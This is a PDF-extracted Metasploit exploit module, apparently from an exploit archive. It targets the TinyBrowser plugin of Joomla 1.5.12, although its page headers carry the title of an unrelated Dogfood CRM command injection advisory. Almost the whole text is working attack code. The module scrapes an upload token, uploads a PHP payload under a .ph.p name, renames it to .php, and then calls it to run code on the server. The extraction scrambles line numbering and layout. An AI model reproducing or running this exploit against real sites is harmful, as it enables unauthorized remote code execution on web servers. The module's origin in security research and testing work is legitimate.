Dogfood CRM 2.0.10 spell.php Command Injection.pdf

Loading ...
Global Do...
News & Politics
1 ##
2 # This file is part of the Metasploit Framework and may be subject to
3 # redistribution and commercial restrictions. Please see the Metasploit
4 # Framework web site for more information on licensing and terms of use.
5 # http://metasploit.com/framework/
6 ##
7
8
9 require ’msf/core’
10
11
12 class Metasploit3 < Msf::Exploit::Remote
13
14
include Msf::Exploit::Remote::HttpClient
15
16
def initialize(info = {})
17
super(update_info(info,
18
’Name’           => ’Joomla 1.5.12 TinyBrowser File Upload Code Execution’,
19
’Description’    => %q{
20
This module exploits a vulnerability in the TinyMCE/tinybrowser plugin.
21
This plugin is not secured in version 1.5.12 of joomla and allows the upload
22
of files on the remote server. 
23
By renaming the uploaded file this vulnerability can be used to upload/execute
24
code on the affected system.
25
},
26
’Author’         => [ ’spinbad <spinbad.security[at]googlemail.com>’ ],
27
’License’        => MSF_LICENSE,
28
’Version’        => ’$Revision$’,
29
’References’     =>
30
[
31
[’URL’, ’http://milw0rm.com/exploits/9296’],
32
[’URL’, ’http://developer.joomla.org/security/news/301−20090722−core−file−upload.html’],
33
],
34
’Privileged’     => false,
35
’Payload’        =>
36
{
37
’DisableNops’ => true,
38
’Compat’      => 
39
{
40
’ConnectionType’ => ’find’,
41
},
42
’Space’       => 1024,
43
},
44
’Platform’       => ’php’,
45
’Arch’           => ARCH_PHP,
46
’Targets’        => [[ ’Automatic’, { }]],
47
’DisclosureDate’ => ’July 22 2009’,
48
’DefaultTarget’  => 0))
49
50
register_options(
51
[
52
OptString.new(’URI’, [true, "Joomla directory path", "/"]),
Page 1/4
Dogfood CRM 2.0.10 spell.php Command Injection
LSO
03/03/2009
53
], self.class)
54
end
55
56
def check
57
res = send_request_raw({
58
’uri’     => datastore[’URI’] + ’/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&fold
er=’
59
}, 25)
60
61
if (res and res.body =~ /flexupload.swf/)
62
63
return Exploit::CheckCode::Vulnerable
64
65
end
66
67
return Exploit::CheckCode::Safe
68
end
69
70
71
def retrieve_obfuscation()
72
73
end
74
75
76
def exploit
77
78
cmd_php = ’<?php ’ + payload.encoded + ’?>’
79
80
# Generate some random strings
81
cmdscript
= rand_text_alpha_lower(20) 
82
boundary = rand_text_alphanumeric(6)
83
84
# Static files
85
directory 
= ’/images/stories/’
86
tinybrowserpath = ’/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/’
87
cmdpath 
= directory + cmdscript 
88
89
# Get obfuscation code (needed to upload files)
90
obfuscation_code = nil
91
res = send_request_raw({
92
’uri’     => datastore[’URI’] + tinybrowserpath + ’/upload.php?type=file&folder=’
93
}, 25)
94
95
if (res)
96
97
if(res.body =~ /"obfus", "((\w)+)"\)/)
98
obfuscation_code = $1
99
print_status("Successfully retrieved obfuscation code: #{obfuscation_code}")
100
else
101
print_error("Error retrieving obfuscation code!")
102
return
103
end
Page 2/4
Dogfood CRM 2.0.10 spell.php Command Injection
LSO
03/03/2009
104
end
105
106
107
108
# Upload shellcode (file ending .ph.p)
109
data = "−−#{boundary}\r\nContent−Disposition: form−data; name=\"Filename\"\r\n\r\n"
110
data << "#{cmdscript}.ph.p\r\n−−#{boundary}"
111
data << "\r\nContent−Disposition: form−data; name=\"Filedata\"; filename=\"#{cmdscript}.ph.p\"\r\n"
112
data << "Content−Type: application/octet−stream\r\n\r\n"
113
data << cmd_php
114
data << "\r\n−−#{boundary}−−"
115
116
res = send_request_raw({
117
’uri’
  => datastore[’URI’] + tinybrowserpath + "/upload_file.php?folder=/images/stories/&type=file&feid=&o
bfuscate=#{obfuscation_code}&sessidpass=",
118
’method’  => ’POST’,
119
’data’    => data,
120
’headers’ =>
121
{
122
’Content−Length’ => data.length,
123
’Content−Type’
 => ’multipart/form−data; boundary=’ + boundary,
124
}
125
}, 25)
126
127
if (res and res.body =~ /File Upload Success/)
128
print_status("Successfully uploaded #{cmdscript}.ph.p")
129
else
130
print_error("Error uploading #{cmdscript}.ph.p")
131
end
132
133
134
# Complete the upload process (rename file)
135
print_status("Renaming file from #{cmdscript}.ph.p_ to #{cmdscript}.ph.p")
136
res = send_request_raw({
137
’uri’     => datastore[’URI’] + tinybrowserpath + ’upload_process.php?folder=/images/stories/&type=file&feid=&
filetotal=1’
138
})
139
140
141
# Rename the file from .ph.p to .php
142
res = send_request_cgi({
143                         ’method’    => ’POST’,
144                         ’uri’       => datastore[’URI’] + tinybrowserpath + ’/edit.php?type=file&folder=’,        
145                         ’vars_post’ => 
146                         {
147                                 ’actionfile[0]’ => "#{cmdscript}.ph.p",
148
’renameext[0]’   => ’p’,
149
’renamefile[0]’ => "#{cmdscript}.ph",
150
’sortby’ => ’name’,
151
’sorttype’ => ’asc’,
Page 3/4
Dogfood CRM 2.0.10 spell.php Command Injection
LSO
03/03/2009
152
’showpage’ => ’0’,
153
’action’ => ’rename’,
154
’commit’ => ’’,
155
156                         }
157                 }, 10)
158
159
if (res and res.body =~ /successfully renamed./) 
160
print_status ("Renamed #{cmdscript}.ph.p to #{cmdscript}.php")
161
else
162
print_error("Failed to rename #{cmdscript}.ph.p to #{cmdscript}.php")
163
end
164
165
166
# Finally call the payload
167
print_status("Calling payload: #{cmdscript}.php")
168
res = send_request_raw({
169
’uri’
=> "#{datastore[’URI’] }images/stories/#{cmdscript}.php"
170
}, 25)
171
172
173
end
174 end
Page 4/4
Dogfood CRM 2.0.10 spell.php Command Injection
LSO
03/03/2009